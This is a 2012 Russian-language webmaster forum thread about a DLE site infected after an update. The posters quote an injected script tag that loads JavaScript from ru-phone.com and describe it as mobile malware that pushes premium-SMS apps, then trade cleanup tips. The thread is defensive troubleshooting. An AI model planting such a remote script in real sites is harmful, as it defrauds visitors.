X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Появился непонятный код, я в непонятках...
Artamos
Artamos
Topic Starter сообщение 18.3.2012, 0:07; Ответить: Artamos
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 549
Регистрация: 26.9.2010
Из: Пермь
Поблагодарили: 75 раз
Репутация:   15  


Стоял сайт на DLE 9.3, пол года стоял себе спокойно, но ту я с дуру решил обновить до DLE 9.5 и через некоторое время все заголовки и значения ссылок просто стерлись из шаблона. Полез в код, сразу бросился в глаза странный код:
<script src="http://ru-phone.com/jquery-1.7.1.min.js"></script>

Точно знаю, что его раньше не было, но не понимаю откуда он мог появиться. Из дополнительных модулей на сайте имеется только форум bullet energy и всё. Все файлы рыть не хочется, поэтому спрашиваю, не встречалась ли у других такая проблема? И как могли залезть в DLE 9.5, все права расставлены, ничего лишнего специально не подключал.


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PostBrigada
PostBrigada
сообщение 18.3.2012, 0:18; Ответить: PostBrigada
Сообщение #2


Фриланс - моя жизнь
******

Группа: Super Moderator
Сообщений: 2476
Регистрация: 26.6.2011
Из: КИРОВ
Поблагодарили: 1427 раз
Репутация:   193  


такая же фигня была на днях. но перед этим вылечил сайт от вирусов редиректоров, которые ниодин антивирь не видел кроме аваста, я думаю на них. Скрипт такой же появился, пока не удаляю, не знаю что делать


--------------------
Наполнение сайтов уникальным контентом, наполнение ИМ. Услуги рерайта и копирайта
Здесь на фейках соц сетей я зарабатываю больше чем в ГГЛ и Ротапост
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
fioru
fioru
сообщение 18.3.2012, 0:23; Ответить: fioru
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 508
Регистрация: 30.11.2010
Из: Смоленск
Поблагодарили: 172 раза
Репутация:   37  


Зря не удаляете... эта фигня скорее всего отнимает у Вас мобильный трафик устанавливая на телефон посетителя прогу рассылающую платные смски

Сообщение отредактировал fioru - 18.3.2012, 0:24
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Artamos
Artamos
Topic Starter сообщение 18.3.2012, 0:34; Ответить: Artamos
Сообщение #4


Завсегдатай
*****

Группа: Active User
Сообщений: 549
Регистрация: 26.9.2010
Из: Пермь
Поблагодарили: 75 раз
Репутация:   15  


Почитал комменты тут и видимо кто-то нашел уязвимость в ДЛЕ 9.5 раз начались взломы даже официальных версий, но celsoft как всегда репу чешет...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 18.3.2012, 0:37; Ответить: Electric
Сообщение #5


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


(Artamos @ 17.3.2012, 23:07) *
<script src="http://ru-phone.com/jquery-1.7.1.min.js"></script>
Удаляйте не раздумывая.
Все пути должны быть локальными.
Если скрипт грузится с другого сервера - 90% что это вирус.
Просто так вы его не отловите так как он проверяет по User Agent через какой браузер загружается страница.
Если это мобильный браузер - сразу предлагает "обномить устаревшую миниоперу".
И при этом ставит на телефон програму для рассылки смс на короткие платные номера...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
firsov
firsov
сообщение 18.3.2012, 0:38; Ответить: firsov
Сообщение #6


Участник
***

Группа: User
Сообщений: 121
Регистрация: 24.11.2011
Из: Бывший СССР
Поблагодарили: 12 раз
Репутация:   1  


у меня тоже такая же беда была. я базу данных на комп перекинул, авастом потом поубивал все эти скрипты, там левых файлов Js появляется целый вагон, потом обратно залил на хост и пароли до кучи от FTP сменил. после данных манипуляций в админке пропал шаблон, ваще короче пусто и новости добавить не могу, тоже пустая страница. dry.gif


--------------------
Автоматический обмен валют Webmoney - Visa/MasterCard, АльфаБанк, Втб24, СберБанк
FOREX OPTIMUM Лучшая партнерская программа 2012 года
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
tomaas
tomaas
сообщение 18.3.2012, 0:48; Ответить: tomaas
Сообщение #7


Новичок
*

Группа: User
Сообщений: 26
Регистрация: 17.2.2012
Поблагодарили: 4 раза
Репутация:   0  


я бы htaccess проверил
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PostBrigada
PostBrigada
сообщение 18.3.2012, 0:49; Ответить: PostBrigada
Сообщение #8


Фриланс - моя жизнь
******

Группа: Super Moderator
Сообщений: 2476
Регистрация: 26.6.2011
Из: КИРОВ
Поблагодарили: 1427 раз
Репутация:   193  


(Artamos @ 18.3.2012, 0:34) *
кто-то нашел уязвимость в ДЛЕ 9.5 раз начались взломы

9.2 стоит ДЛЕ. Все JS были заражены, так как их немеренно, тупо перезалил двиг и шаблон. Кстати, плюсом EVAL сидел еще, проверьете

имя сайта/engine/skins/codemirror/js/code.js - последние строки непонятного кода со словом eval

И поставьте аваст последний, он ругаеться сразу на эти вещи, даже хваленый каспер молчит

Сообщение отредактировал PostBrigada - 18.3.2012, 0:50


--------------------
Наполнение сайтов уникальным контентом, наполнение ИМ. Услуги рерайта и копирайта
Здесь на фейках соц сетей я зарабатываю больше чем в ГГЛ и Ротапост
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Artamos
Artamos
Topic Starter сообщение 18.3.2012, 0:59; Ответить: Artamos
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 549
Регистрация: 26.9.2010
Из: Пермь
Поблагодарили: 75 раз
Репутация:   15  


(Electric @ 18.3.2012, 0:37) *
Удаляйте не раздумывая.

Удалить-то не проблема, только этот код скоро снова появится. Посмотрел другие сайты на хостинге, все чистые - значит проблема именно в ДЛЕ, а не серверном ПО. Судя по тому, что заражены все шаблоны и характеру замены можно утверждать - распространение вредоносного кода происходит автоматизированно, т.е. пароли с компьютера никто не крал. Уже хорошо, круг поиска сузился, остается только найти уязвимость smile.gif


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
PostBrigada
PostBrigada
сообщение 18.3.2012, 1:07; Ответить: PostBrigada
Сообщение #10


Фриланс - моя жизнь
******

Группа: Super Moderator
Сообщений: 2476
Регистрация: 26.6.2011
Из: КИРОВ
Поблагодарили: 1427 раз
Репутация:   193  


(Artamos @ 18.3.2012, 0:59) *
пароли с компьютера никто не крал


Большая вероятность, что сами затащили, я проверился и нашел неприятный букет. До этого поползал на хосте


--------------------
Наполнение сайтов уникальным контентом, наполнение ИМ. Услуги рерайта и копирайта
Здесь на фейках соц сетей я зарабатываю больше чем в ГГЛ и Ротапост
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыPHP код для og:image в Джумла
Нужен PHP код для заполнения мета тега meta property
8 Курыкин 1351 25.10.2017, 12:06
автор: Fassendek
Открытая тема (нет новых ответов) В Вебмастере появился приоритетный переобход Sitemap
Новый функционал в Вебмастере
4 4ester7 1235 23.10.2017, 14:10
автор: ProxyMania
Открытая тема (нет новых ответов) Промо код Гугл Эдвордс 2000 рублей
Может кому то будет нужен
3 alllffa 866 9.10.2017, 12:12
автор: alllffa
Открытая тема (нет новых ответов) В России появился особый ГОСТ для штрих- и QR-кодов
4 MissContent 697 20.9.2017, 20:31
автор: fogoter
Открытая тема (нет новых ответов) Требуется поправить (оптимизировать) код вёрстки WP
0 Seo-optimist 747 26.12.2015, 21:19
автор: Seo-optimist


 



RSS Текстовая версия Сейчас: 14.12.2017, 23:20
Дизайн